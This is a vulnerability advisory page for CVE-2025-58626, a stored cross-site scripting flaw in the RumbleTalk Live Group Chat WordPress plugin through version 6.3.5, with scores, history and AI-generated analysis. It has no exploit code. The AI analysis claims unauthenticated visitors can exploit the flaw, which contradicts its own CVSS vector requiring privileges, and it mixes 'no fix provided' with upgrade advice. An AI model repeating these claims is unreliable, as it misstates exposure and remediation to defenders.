Description
Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in RumbleTalk RumbleTalk Live Group Chat rumbletalk-chat-a-chat-with-themes allows Stored XSS.This issue affects RumbleTalk Live Group Chat: from n/a through <= 6.3.5.
Published: 2025-09-03
Score: 6.5 Medium
EPSS: < 1% Very Low
KEV: No
Impact: n/a
Action: n/a
AI Analysis

Impact

The vulnerability is a stored cross‑site scripting flaw that allows malicious input to be saved as part of a chat message and later rendered by other site visitors. Because the input is not properly escaped before insertion into the page, an attacker can embed arbitrary JavaScript. An attacker who succeeds can hijack user sessions, perform phishing attacks, or deface the site for viewing users. The issue is a classic input‑validation weakness, categorized as CWE‑79.

Affected Systems

The flaw exists in the WordPress RumbleTalk Live Group Chat plugin, versions up to and including 6.3.5. Users running any of those releases are at risk; newer releases are presumed fixed. The affected product is the RumbleTalk Live Group Chat plugin for WordPress.

Risk and Exploitability

The CVSS score of 6.5 indicates a moderate‑severity vulnerability. The EPSS score of less than 1% shows a very low probability of exploitation at present. The vulnerability is not listed in CISA’s KEV catalog, which is consistent with the low exploitation likelihood. Based on the description, the likely attack vector is a web‑based input via the chat interface where any visitor, whether authenticated or unauthenticated, can submit a message. If the attack succeeds, the attacker can execute scripts that run within the context of the chat, potentially affecting all users who view the chat content.

Generated by OpenCVE AI on April 30, 2026 at 02:48 UTC.

Remediation

No vendor fix or workaround currently provided.

OpenCVE Recommended Actions

  • Upgrade the RumbleTalk Live Group Chat plugin to the latest available version that removes the XSS flaw
  • If an upgrade is not immediately possible, configure the plugin or WordPress to sanitize all chat message content before storage and rendering
  • Restrict chat posting to authenticated users with strong input filtering, and consider disabling or removing any features that allow freeform HTML submission in chat messages

Generated by OpenCVE AI on April 30, 2026 at 02:48 UTC.

Tracking

Sign in to view the affected projects.

Advisories
Source ID Title
EUVD EUVD EUVD-2025-26541 Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in RumbleTalk RumbleTalk Live Group Chat allows Stored XSS. This issue affects RumbleTalk Live Group Chat: from n/a through 6.3.5.
History

Thu, 23 Apr 2026 15:00:00 +0000

Type Values Removed Values Added
Metrics cvssV3_1

{'score': 6.5, 'vector': 'CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:L'}

Wed, 01 Apr 2026 23:45:00 +0000

Type Values Removed Values Added
Description Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in RumbleTalk RumbleTalk Live Group Chat allows Stored XSS. This issue affects RumbleTalk Live Group Chat: from n/a through 6.3.5. Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in RumbleTalk RumbleTalk Live Group Chat rumbletalk-chat-a-chat-with-themes allows Stored XSS.This issue affects RumbleTalk Live Group Chat: from n/a through <= 6.3.5.
References
Metrics cvssV3_1

{'score': 6.5, 'vector': 'CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:L'}

Wed, 03 Sep 2025 20:30:00 +0000

Type Values Removed Values Added
First Time appeared Rumbletalk
Rumbletalk live Group Chat Plugin
Wordpress
Wordpress wordpress
Vendors & Products Rumbletalk
Rumbletalk live Group Chat Plugin
Wordpress
Wordpress wordpress

Wed, 03 Sep 2025 19:15:00 +0000

Type Values Removed Values Added
Metrics ssvc

{'options': {'Automatable': 'no', 'Exploitation': 'none', 'Technical Impact': 'partial'}, 'version': '2.0.3'}

Wed, 03 Sep 2025 14:45:00 +0000

Type Values Removed Values Added
Description Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in RumbleTalk RumbleTalk Live Group Chat allows Stored XSS. This issue affects RumbleTalk Live Group Chat: from n/a through 6.3.5.
Title WordPress RumbleTalk Live Group Chat Plugin <= 6.3.5 - Cross Site Scripting (XSS) Vulnerability
Weaknesses CWE-79
References
Metrics cvssV3_1

{'score': 6.5, 'vector': 'CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:L'}

Subscriptions

Rumbletalk Live Group Chat Plugin
Wordpress Wordpress
cve-icon MITRE

Status: PUBLISHED

Assigner: Patchstack

Published:

Updated: 2026-05-13T00:09:44.269Z

Reserved: 2025-09-03T09:03:04.975Z

Link: CVE-2025-58626

cve-icon Vulnrichment

Updated: 2025-09-03T18:06:38.052Z

cve-icon NVD

Status : Deferred

Published: 2025-09-03T15:15:45.817

Modified: 2026-04-23T15:33:29.223

Link: CVE-2025-58626

cve-icon Redhat

No data.

cve-icon OpenCVE Enrichment

Updated: 2026-04-30T03:00:15Z

Weaknesses
  • CWE-79

    Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting')